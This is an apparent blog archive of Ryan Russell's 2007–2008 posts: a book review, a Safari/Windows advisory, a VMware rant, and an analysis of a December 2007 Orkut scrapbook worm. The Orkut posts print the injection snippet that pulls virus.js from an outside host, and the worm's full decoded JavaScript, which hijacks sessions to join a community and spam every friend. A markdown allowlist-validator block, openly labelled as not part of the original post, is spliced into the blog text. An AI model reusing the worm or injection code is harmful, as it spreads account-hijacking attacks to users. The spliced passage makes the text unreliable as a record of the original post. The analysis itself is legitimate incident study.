Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-17896733185522419752008-06-08T14:26:00.000-07:002008-06-08T15:59:48.511-07:00Little BrotherI just finished reading <a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2FLittle-Brother-Cory-Doctorow%2Fdp%2F0765319853&tag=thievco&linkCode=ur2&camp=1789&creative=9325">Little Brother</a><img src="http://www.assoc-amazon.com/e/ir?t=thievco&l=ur2&o=1" alt="" style="border: medium none ! important; margin: 0px ! 
important;" border="0" height="1" width="1" /> by Cory Doctorow while on a plane to Seattle for a <a href="http://windowssecrets.com/">Windows Secrets</a> meetup.<br /><br />There are a few audiences one might rate this book against. Probably the only fair one is the one Cory wrote for, young adult readers who need an introduction to electronic civil rights (and civil rights in general, for that matter.) For that audience, I think he has succeeded admirably. I will make my copy available to my kids, and see if any of them have an opinion.<br /><br />To be sure, the book tries to indoctrinate readers to the cyber libertarian way of thinking. Since I happen to agree with that doctrine, I have no problem with that. (And yes, I gave up fighting the use of "cyber". I lose.)<br /><br />Another audience I might rate this book against is the one I put myself in. Middle-aged infosec people. Perhaps with a little amateur writer thrown in. I still recommend the book, but now I have to start breaking out caveats and picking nits.<br /><br />Spoilers ahoy.<br /><br />First off, how's the tech? This is a sliding graph. Compared to the vast majority of the books in the world, Cory's technical accuracy is quite high. There are extreme ends of this scale. For example, Dan Brown (The Da Vinci Code author) writes with basically zero tech accuracy. Amazingly good, page-turning drama. Horrible tech. So Dan's down at the great writing, lousy tech corner.<br /><br />If I may give my ego a backhanded stroke for a moment, I place myself up at the opposite corner. In the <a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Furl%3Dsearch-alias%253Daps%26field-keywords%3Dstealing%2Bthe%2Bnetwork%26x%3D0%26y%3D0&tag=thievco&linkCode=ur2&camp=1789&creative=9325">Stealing the Network</a><img src="http://www.assoc-amazon.com/e/ir?t=thievco&l=ur2&o=1" alt="" style="border: medium none ! important; margin: 0px ! 
important;" border="0" height="1" width="1" /> series, I went way out of my way to make my tech 100% accurate. I also acknowledge that my writing probably sucks, so I like to think of myself as the anti-Dan Brown. Mercifully, my books are shelved in the Computer section of book stores.<br /><br />Cory's writing in Little Brother is good and his tech is very good. (For a not-specifically tech, non-hacking book). So he's in the upper-right quadrant of the graph.<br /><br />But of course I'm compelled to point out specific problems. Cory sacrifices some accuracy for plot in a few key places. And appropriately so, I think. The plot flows better this way. Biggest example is the RFID rewriting. The majority of the tags are not rewritable. Cory has kids running around doing non-contact rewrites of FastTrak and other cheap RFID tags. Doesn't work in real life. Nor, I believe, in the near future.<br /><br />Speaking of time, I can't recall spotting anything in the book that would indicate a specific year. I'm sure that's intentional. I've had my books described as being 10 minutes into the future. I think Cory's at 60 minutes. It reads like now plus 5 to 10 years.<br /><br />Cory's writing also snags in a few places. (Keep in mind, just because I can spot someone else doing it doesn't mean I can avoid doing it myself.) One of his purposes is to instruct. He doesn't assume the reader knows what an RFID tag is in the first place. This is where there's a big difference between random YA reader and someone like me who has been doing security for years.<br /><br />For me, he's way over-explaining, and the story grinds to a halt. It's mostly first-person, and so are the explanations. But the first person goes from being aimed at someone in the story to being aimed at the reader. It's as if the main character turns to look straight out of the page at you. For someone who knows these things, it's like saying "money can be used for goods and services." 
So this lessened the enjoyment of the story aspect for me somewhat. But again, probably a tradeoff he made.<br /><br />I also am already caught up on all the technical and political aspects the book covers, so I didn't learn anything new there. But then I read Boing Boing, was around when the EFF was founded, have been going to various hacking conferences for over a decade, and know half of the people Cory used for source material.<br /><br />In my case, that leaves the story. On to the parts I did like. I find the overall plot, sadly, believable. It's almost entirely set in San Francisco and the Bay Area, where I live. So he gets local color points. He came up with a number of characters I care about. He made me angry about what was happening in the story. After the first couple of chapters, I had to spend all my spare time reading it.<br /><br />Let me see if I can help you categorize yourself as a person who would agree with the politics of this book, and would be ok sharing with a YA reader. Do you get mad every time <a href="http://thomashawk.com/">Thomas Hawk</a> links to a story about a photographer getting hassled by the police or a security guard? Do you want to call up and scream at a school board or principal when <a href="http://www.fark.com/">Fark</a> links to a story about some kid getting expelled for a t-shirt or haircut? Do you have nothing but contempt for the <a href="http://www.emergentchaos.com/archives/2008/06/praises_for_the_tsa.html">TSA</a> every time you find yourself removing your shoes at the airport?<br /><br />If the answer is yes, then you will probably "enjoy" the plot and be right on board with the political implication. Be prepared to spend the first half of the book angry.<br /><br />You know what else I liked? Cory didn't shy away from the other points of view in the discussion. He goes ahead and points out how his main character is just like a terrorist. He gets screwed over by his parents for most of the book. 
Some of his own friends give up on him. Some of his trusted circle betray him. He doubts constantly. He suffers for it. It's not like Cory's position still isn't clear, but I appreciate him exposing all the costs.<br /><br />The big moral of the story is that intrusive government sucks. But the smaller moral is that you have to stand up for your own rights, and it's going to hurt.<br /><br /><a href="http://craphound.com/littlebrother/download/">Little Brother download page</a><a href="http://www.google.com/search?hl=en&safe=off&domains=boingboing.net&sitesearch=boingboing.net&q=%22little+brother%22&btnG=Search&sitesearch=boingboing.net"><br />Little Brother posts</a> on Boing Boing<a href="http://www.boingboing.net/2004/08/22/stealing-the-network.html"><br />Cory's review of one of my books</a> (seems only fair)Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-12173196365422810022008-05-31T10:27:00.000-07:002008-05-31T10:28:46.768-07:00Race to ZeroThe <a href="http://www.racetozero.net/">Race to Zero</a> contest.<br /><br />So, people are going to write some new packers? 
OK, no problem then.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-48845825591463876152008-05-30T21:43:00.000-07:002008-05-31T11:07:07.193-07:00Is Microsoft dropping Apple 0-day?Just saw this link show up in my RSS reader:<a href="http://www.microsoft.com/technet/security/advisory/953818.mspx"><br /></a><a href="http://www.microsoft.com/technet/security/advisory/953818.mspx">Microsoft Security Advisory (953818) Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform</a><br /><br />From the advisory:<br /><br /><blockquote>FAQ<br /><br /><b>What causes this threat?</b><br />A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed. Safari is available as a stand-alone install or through the Apple Software Update application.<br /></blockquote><br />And<br /><br /><blockquote>Workarounds<p>Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.</p><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Change the download location of content in Safari to a location other than ‘Desktop’</p><p>Launch Safari. Under the <b>Edit</b> menu select <b>Preferences</b>. </p><p>At the option where it states <b>Save Downloaded Files to:</b>, select a different location on the local drive. </p></td></tr></tbody></table></blockquote>So... that sounds a lot like if I were to download a desktop.ini file or something like that, I'd get my Windows all 0wned. 
As in, if I cared to, I probably wouldn't have to work too hard to figure out how to exploit this from Microsoft's description and workaround.<br /><br />Is this being exploited in the wild or something? Otherwise I kinda would have expected Microsoft to keep quiet until it was patched by Apple.<br /><br />I guess Apple <a href="http://www.betanews.com/article/Apple_pushing_iTunes_QT_users_on_Windows_to_download_Safari/1206113171">pushing Safari on Windows iTunes/Quicktime users</a> isn't looking so hot about now?<br /><br /><span style="font-weight: bold;">Update:</span><br />Aha, pointer from <a href="http://apple.slashdot.org/article.pl?sid=08/05/31/1214254">Slashdot</a> and <a href="http://www.theregister.co.uk/2008/05/31/microsoft_warns_against_apple_safari/">The Register</a>. The <a href="http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html">carpet bombing</a> seems to be the genesis, but that's not the whole story, since he doesn't talk about executing code.<br /><br /><span style="font-weight: bold;">Update2:</span><br /><a href="http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx">There it is</a>, it was found by Aviv Raff.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-82489939981902538882008-05-03T14:06:00.000-07:002008-05-03T14:20:10.491-07:00Tweaking content (administrivia)I have a tendency to write full essays, and only when I'm aroused enough to spend the time, and then only when I can afford the time at that moment. I've also avoided more personal and trivial stuff, because the blog is part of the <a href="http://networks.feedburner.com/Security-Bloggers-Network">Security Blogger's Network</a> and because most of you read this because of security-related things.<br /><br />Well, those are problems that have an easy technical solution. I've created a <a href="http://feeds.feedburner.com/ryanlrussellsecurity">security-only feed</a>. 
If you only want the security-related stuff (things I tag "security"), then change your subscription to this feed.<br /><br />If you want all the other crap I decide to come up with, continue to use the full feed.<br /><br />I titled the blog "ryanlrussell", I planned to have it be an egofest from the beginning, I just got sidetracked. So what have I been holding back on? Attempts at short fiction, things about my kids, other technology stuff, more things I want to keep a pointer to, and so on. You know that thing that bloggers do that people complain about where they just point to some article and have a short comment without a lot of insight and value add? I'm going to do more of that.<br /><br />There will be a tsunami of content. Relatively speaking. Prepare for boarding.<br /><br />I'm going to go tweak old posts, which I'm sure will cause old articles to hit your readers again. Apologies in advance. Should be mostly a one-time thing.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-2433772145275383562008-03-22T15:27:00.000-07:002008-03-22T16:42:37.440-07:00Arr! VMWare is driving me nuts.Several random VMWare things I want to throw out there that bother me.<br /><br />At this point, I have used and continue to use most of VMWare's products. This started with Workstation back to 3.x.<br /><br />Oh, and let me get my biases out of the way; I run a QA department, and we use VMWare for everything we can. Nothing better than being able to restore to a known state or save off a machine exactly where it is when exhibiting a problem. BigFix, where I work, also makes an agent that runs inside the management partition on ESX 3.x boxes.<br /><br />VMWare Workstation - Great product, great price point. You can run multiple machines (a few), manage whole snapshot trees. Only really useful if you're in front of the box Workstation is running on. Gets the bleeding-edge features. 
VMs running under Workstation don't perform great, but are adequate if you give them enough physical RAM. Pretty much exactly matches expectations, but then it's the first product and is the one the others vary from. So in a very real way, this is what sets my expectations for the other products.<br /><br />VMWare Server - The first larger VMWare purchase I made was GSX Server, somewhere around $3,000US for the software, and a $6,000 Dell 2U running Windows to put it on (BigFix's money, not my personal budget). Not bad, performance is still not great, slightly worse than Workstation. Might be because of remote access latency. Shareable, remote access built-in, which is key. Only one snapshot though, which is an immediate problem. I can manually backup machines at the expense of 30 minutes instead of 60 seconds, and disk space per copy is the same as the original rather than a fraction like a snapshot. But I found I could have a library of 30 machines, and run around 15 simultaneously, depending.<br /><br />I originally assumed they had just left it out of GSX so far... or maybe, that was their hook to get people to go to ESX? I hadn't looked into ESX yet at the time. It's not a casual evaluation. That's about when VMWare made Server free. Hey, great right? No. There go my hopes of ever getting multiple snapshots on Server. Because VMWare would be insane to put that feature in the free product. For someone in my position, multiple snapshots are probably 40% of the advantage of ESX over Server. And I use ESX now, so why do I care? Because I can't give up Server! I have to keep using this intentionally crippled product. I'll get to why in a sec.<br /><br />VMWare ESX Server (family) - At this point BigFix has standardized on ESX for as many QA machines as possible. (We have stuff that runs on Mac, Solaris SPARC, AIX PPC, HP-UX PA-RISC and Itanium, Windows Itanium, Windows Mobile on ARM. The x86 virtualization doesn't help much on those. 
It could with Mac, but Apple only just recently allowed OS X Server on VMs. When I'm trying to qualify our product on OS X, I can't go the hackintosh route. Also, I have a DLP product and some Wake-on-LAN functions I need real machines for. Oh, and I have an agent that runs IN ESX. I can't run ESX in ESX....)<br /><br />But back to what I LIKE about ESX for a sec. It's the fastest of the bunch, scales better, has better remote access, better machine cloning, migration between physical ESX hosts and drives, and has MULTIPLE SNAPSHOTS. I put my team on ESX, and some of the install matrix stuff instantly takes half the time because of the snapshot feature alone. There's also an almost real infrastructure management. For my purposes, this means I get all my VMs in one window with one login. If you have more than one Server, then you log into each one separately (as far as I know. More on that in a sec, too.) I have as many as 30-40 machines running simultaneously per physical ESX box, out of a library coming up on 100, and it does a fantastic job at resource sharing the 8 cores and 16GB of RAM per physical box. It loves it some disk space, but that sort of thing happens when you build a hundred VMs averaging around 10GB each.<br /><br />Sure, it's a little pricey. I think I'm paying $3000-4000 per ESX box, plus something for Virtual Center, and I'm not sure what else. I'm buying $9,000 Dell 2Us now, because ESX can actually make use of the resources. And I'm in for an external Dell SATA drive array, 15 400GB drives RAIDed, giving me 1TB on one ESX box, and 1.4TB on the other ESX box. I think we paid $15,000-$20,000 for that. I get less clear on the costs at this point, because I can now just budget for more capacity, and my IT department is buying it. We're in the process of picking out a 40TB SAN for the big cutover, where I bring some other groups into production on ESX who have been suffering with Workstation and piles of external 500GB USB hard drives. 
We have a tiny bit of production virtualization that VMWare constantly touts, but 90% of my ESX use falls under QA-style use.<br /><br />Great, right? So one day, I grab the VMWare Converter tool (awesome tool!) to convert the last of my Server images over to ESX... and it balks. OK, no big deal... I can make them again, they're just a few Win9x boxes, some Solaris x86 10... Hey, the Win9x OSes are missing from the list of standard OSes in the UI. I do some digging, and...<br /><br />Windows 9x is not supported on ESX.<br /><br />What? That can't be right... do some investigation... supported on Workstation... supported on Server. Not supported on ESX.<br /><br />The Solaris x86 10 doesn't seem to work so well on ESX either, though support is claimed. But only starting at a particular patch level. Uh, I kinda need to test compatibility all the way back to no patches, guys. But I haven't finished my heroic effort getting it running on ESX yet. (Not that I should have to work that hard, of course.)<br /><br />So in one shot, ESX has now forced me to maintain some number of Server machines. Sure, I already had to have piles of physical boxes for the random non-x86 unices. But I was so close on the Win9x. It should work. VMWare just doesn't want to. Can I have multiple snapshots on Server? No. Can I have Win9x on ESX? No. And I can't pay them for it, they don't want to.<br /><br />While I'm complaining, there's one more thing I don't like about ESX (besides the usual incremental stuff). I have no idea what the various ESX pieces do, or if I have them, or if I want them, or what kind of setup I need for them. I know I have ESX, Converter, and Virtual Center. I think I want VMotion. I think it does cool stuff with automatically balancing loads and migrating machines. I think I need a SAN for that. I sure hope my IT guy who spec'd that and the SAN out has it straight. I think there are bundles that have some of what I want. 
And I don't know what else I'm missing.<br /><br />Like, I have Virtual Center. Does that help with my requirement for Server still? I don't think it does. I could be wrong. There's some ACE authentication product or something too, right? Why would I want that? What does it do?<br /><br />Why did you buy Determina?<br /><br />Now, if you actually know what you're doing with VMWare, you are assuming I haven't done my homework and haven't been to training and haven't been reading the docs and whitepapers. And you're right. But I'm the customer. I have entitlement issues. I define good products as ones that I can figure out without much work, that don't make me read the docs. I've been doing this for 25 years now, I like it this way. If I have to read your docs, then I lose for some reason. So when I can't figure out your product line differentiation, that's ultimately our fault and you have made me bitter and/or sold me less. Make it simpler.<br /><br />And then when I HAVE figured out your product differentiation when you didn't really want me to (i.e. your artificial limitations), that's not so hot either.<br /><br />OK, I feel better thanks. And yes, for those of you who actually know the VMWare stuff in depth, PLEASE correct me.<br /><br />BTW, what brought on the rant? I've got a presentation next week on malware analysis. I need Windows for that, and I'm carrying around a MacBook Pro with Leopard lately. So I bought a copy of VMWare Fusion straight from VMWare for about $70 yesterday. That's about half the cost of Workstation (Windows/Linux host only.)<br /><br />It only does single snapshots.<br /><br />Could I give you the extra $50 for multiple snapshots, PLEASE?! I only need this on my laptop when I'm traveling. 
I will use just as much ESX when I'm at work, I promise.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-57538394467538228222008-03-04T21:32:00.000-08:002008-03-04T21:38:03.695-08:00My D&DLet me show you it.<br /><br /><a href="http://www.zooomr.com/photos/ryanlrussell/4409944/" title="Photo Sharing"><img src="http://static.zooomr.com/images/4409944_ea0040f79c.jpg" width="500" height="375" alt="DSC02024" /></a><br /><br />Set <A HREF="http://www.zooomr.com/photos/ryanlrussell/sets/29324/">here</A>Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-23815490557158092942007-12-19T00:22:00.000-08:002007-12-19T01:09:55.107-08:00More on Orkut wormYes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.<br /><br />To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!<br /><br />One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.<br /><br />So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. 
Take a look at the chunk of HTML that ends up as a scrapbook entry that I <a href="http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html">posted earlier</a>.<br /><br />It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and Flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?<br /><br />So I did some experiments tonight. I tried the old script-tag alert ('hello I'm an XSS', etc.), and that doesn't work. It says my rich content was rejected, see <a href="http://help.orkut.com/support/bin/answer.py?answer=66309&hl=en-US">here</a>.<br /><br />And yet, I can paste in a much more complicated "embed a Flash movie" expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I'm not seeing how the worm worked so well.<br /><br />So the basic security challenge for Orkut here is that they want to allow some HTML, but not other HTML. As we have seen for many years with web-based email, that's a pretty hard problem to solve.<br /><br />So that's why the hoops to jump through. The worm author needed something that looked like a Flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.<br /><br />This is where the <a href="http://blog.deconcept.com/swfobject/">SWFObject</a> library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. 
They keep it at <a href="http://img2.orkut.com/js/gen/scraps006.js">http://img2.orkut.com/js/gen/scraps006.js</a>, which they source for you.<br /><br />It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.<br /><br />Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you're watching carefully, you'll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least once. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changes the text in case Orkut was keying off that.<br /><br />Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.<br /><br />Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment; I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.<br /><br />It looks like the immediate problem is over. I probably won't have a lot more of a technical nature to say on this one. 
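One way to close the hole described above, as an added example that is not part of the original post or of Orkut's code: an allowlist check that accepts only the SWFObject statement shapes a genuine embed snippet uses and rejects anything else, which is what would have stopped the injected createElement statement in the chunk quoted earlier. The _SWFObject method names are taken from that chunk; the regexes and the assumption that SWFs must come from orkut.com are mine.

```javascript
// Added example, not Orkut's own code: an allowlist check for the scrapbook embed
// snippet. Rather than hunting for bad JavaScript (a denylist, which is what the
// worm slipped past), it accepts only the statement shapes a genuine SWFObject
// snippet contains, with string-literal arguments, and rejects everything else.
// _SWFObject method names come from the chunk quoted on this page; the regexes
// and the allowed SWF origin are assumptions.
const STR = String.raw`'(?:[^'\\]|\\.)*'`;                        // one single-quoted JS string literal
const ARGS = String.raw`\s*(?:(?:${STR}\s*,\s*)*${STR})?\s*`;     // zero or more comma-separated literals
const CTOR = new RegExp(String.raw`^var\s+(\w+)\s*=\s*new\s+_SWFObject\((${ARGS})\)$`);
const CALLS = ["_addParam", "_setAttribute", "_write"].map(
  (fn) => new RegExp(String.raw`^(\w+)\.${fn}\(${ARGS}\)$`));
const SWF_ORIGIN = /^'https?:\/\/(?:www\.)?orkut\.com\//;           // assumed: SWFs must be served by orkut.com

// Returns {ok, reason}. Only the <script> block is checked; the <embed> element
// needs its own allowlist, and the sturdier design is to rebuild the whole
// snippet server-side from a few validated parameters instead of passing HTML through.
function checkEmbedScript(html) {
  const m = html.match(/<script[^>]*>([\s\S]*?)<\/script>/i);
  if (!m) return { ok: false, reason: "no <script> block" };
  // Splitting on ';' is crude, but a literal containing ';' just fails to match
  // any allowed shape and is rejected, so the check fails closed.
  const stmts = m[1].split(";").map((s) => s.trim()).filter(Boolean);
  const ctor = stmts.length ? stmts[0].match(CTOR) : null;
  if (!ctor) return { ok: false, reason: "first statement is not a _SWFObject constructor" };
  const [, name, args] = ctor;
  const swfUrl = args.split(",")[0].trim();                        // first constructor argument
  if (!SWF_ORIGIN.test(swfUrl)) return { ok: false, reason: "SWF not on allowed origin: " + swfUrl };
  for (const s of stmts.slice(1)) {
    const hit = CALLS.map((r) => s.match(r)).find(Boolean);
    if (!hit) return { ok: false, reason: "statement not on allowlist: " + s };
    if (hit[1] !== name) return { ok: false, reason: "call on unexpected object: " + s };
  }
  return { ok: true, reason: "only SWFObject calls with literal arguments" };
}

// The script block from the worm chunk quoted on this page (embed element
// omitted), then a constructed clean snippet of the kind the scrapbook should accept.
const WORM_CHUNK = "<div id=\"flashDiv295378627\"></div><script type=\"text/javascript\"> " +
  "var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); " +
  "flashWriter._addParam('wmode', 'transparent'); " +
  "script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';" +
  "document.getElementsByTagName('head')[0].appendChild(script);escape(''); " +
  "flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); " +
  "flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script>";
const CLEAN_CHUNK = "<div id=\"flashDiv1\"></div><script type=\"text/javascript\"> " +
  "var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '1', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '1'); " +
  "flashWriter._addParam('wmode', 'transparent'); flashWriter._write('flashDiv1');</script>";

console.log(checkEmbedScript(WORM_CHUNK));   // ok: false, names the createElement statement
console.log(checkEmbedScript(CLEAN_CHUNK));  // ok: true
```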
I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.<br /><br />Decoded Javascript:<br /><br />var index=0;<br />var POST=JSHDF["CGI.POST_TOKEN"];<br />var SIG=JSHDF["Page.signature.raw"];<br /><br />function createXMLHttpRequest(){<br /> try {<br /> return new<br /> ActiveXObject("Msxml2.XMLHTTP")<br /> }<br /> catch(e){<br /> } ;<br /><br /> try {<br /> return new ActiveXObject("Microsoft.XMLHTTP")<br /> }<br /> catch(e){<br /> };<br /><br /> try {<br /> return new XMLHttpRequest()<br /> }<br /> catch(e){<br /> } ;<br /> return null<br />};<br /><br />function setCookie(name,value,expires,path,domain,secure){<br /> var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");<br /> document.cookie=curCookie<br />};<br /><br />function getCookie(name){<br /> var dc=document.cookie;<br /> var prefix=name+"=";<br /> var begin=dc.indexOf(";"+prefix);<br /> if(begin==-1){<br /> begin=dc.indexOf(prefix);<br /> if(begin!=0){<br /> return false<br /> }<br /> } else {<br /> begin+=2<br /> };<br /> var end=document.cookie.indexOf(";",begin);<br /><br /> if(end==-1){<br /> end=dc.length<br /> };<br /> return unescape(dc.substring(begin+prefix.length,end))<br />};<br /><br />function deleteCookie(name,path,domain){<br /> if(getCookie(name)){ document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";<br /> history.go(0)<br /> }<br />};<br /><br />function loadFriends(){<br /> var xml=createXMLHttpRequest();<br /> if(xml){<br /> xml.open("GET","http://www.orkut.com/Compose.aspx",true);<br /> xml.send(null);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> if(xml.status==200){<br /> var xmlr=xml.responseText;<br /> var div=document.createElement("div");<br /> div.innerHTML=xmlr;<br /> var 
select=div.getElementsByTagName("select").item(0);<br /> if(select){<br /> select.removeChild(select.getElementsByTagName("option").item(0));<br /> select.setAttribute("id","selectedList");<br /> select.style.display="none";<br /> document.body.appendChild(select);<br /> sendScrap()<br /> }<br /> } else {<br /> loadFriends()<br /> }<br /> }<br /> };<br /> xml.send(null)<br /> }<br />};<br /><br /><br />function cmm_join(){<br /> var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";<br /> var xml=createXMLHttpRequest();<br /> xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);<br /> xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');<br /> xml.send(send);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> if(xml.status!=200){<br /> cmm_join();<br /> return<br /> };<br /> loadFriends()<br /> }<br /> }<br />};<br /><br />function sendScrap(){<br /> if(index==document.getElementById("selectedList").length){<br /> return<br /> };<br /> var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";<br /> var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;<br /><br /> var xml=createXMLHttpRequest();<br /> xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);<br /> xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");<br /> xml.send(send);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> index++;<br /> var wDate=new Date;<br /> wDate.setTime(wDate.getTime()+86400);<br /> setCookie('wormdoorkut',index,wDate);<br /> sendScrap()<br /> }<br /> }<br />};<br /><br />if(!getCookie('wormdoorkut')){<br /> var wDate=new Date;<br /> wDate.setTime(wDate.getTime()+86400);<br /> 
setCookie('wormdoorkut','0',wDate)<br />};<br /><br />index=getCookie('wormdoorkut');<br />cmm_join();<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 0 comments<br /><br />Orkut "virus"<br />Published 2007-12-18T21:02:00.000-08:00, updated 2007-12-19T00:23:41.681-08:00<br /><br />More of a worm, actually.<br /><br />I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:<br /><blockquote><pre wrap="">2008 vem ai... que ele comece mto bem para vc</pre></blockquote><br /><br />I still don't know exactly what it means; I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!<br /><br />I haven't done any kind of thorough analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. 
This is what it looked like:<br /><br /><div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script><br /><br />Looks like it joins you to an Orkut group, too:<br /><br /><A HREF="http://www.orkut.com/Community.aspx?cmm=44001818">Infectados pelo Vírus do Orkut</A>.<br /><br />Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 6 comments<br /><br />Comment spammers<br />Published 2007-10-30T08:23:00.000-07:00, updated 2007-10-30T08:25:51.612-07:00<br /><br />The comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. I'm loath to put any barriers in for people wanting to comment, so sorry about that.<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 1 comment<br /><br />Off to vegas 2007<br />Published 2007-07-31T10:08:00.000-07:00, updated 2007-07-31T10:12:47.798-07:00<br /><br />I'm on my way to Las Vegas for Black Hat & Defcon. 
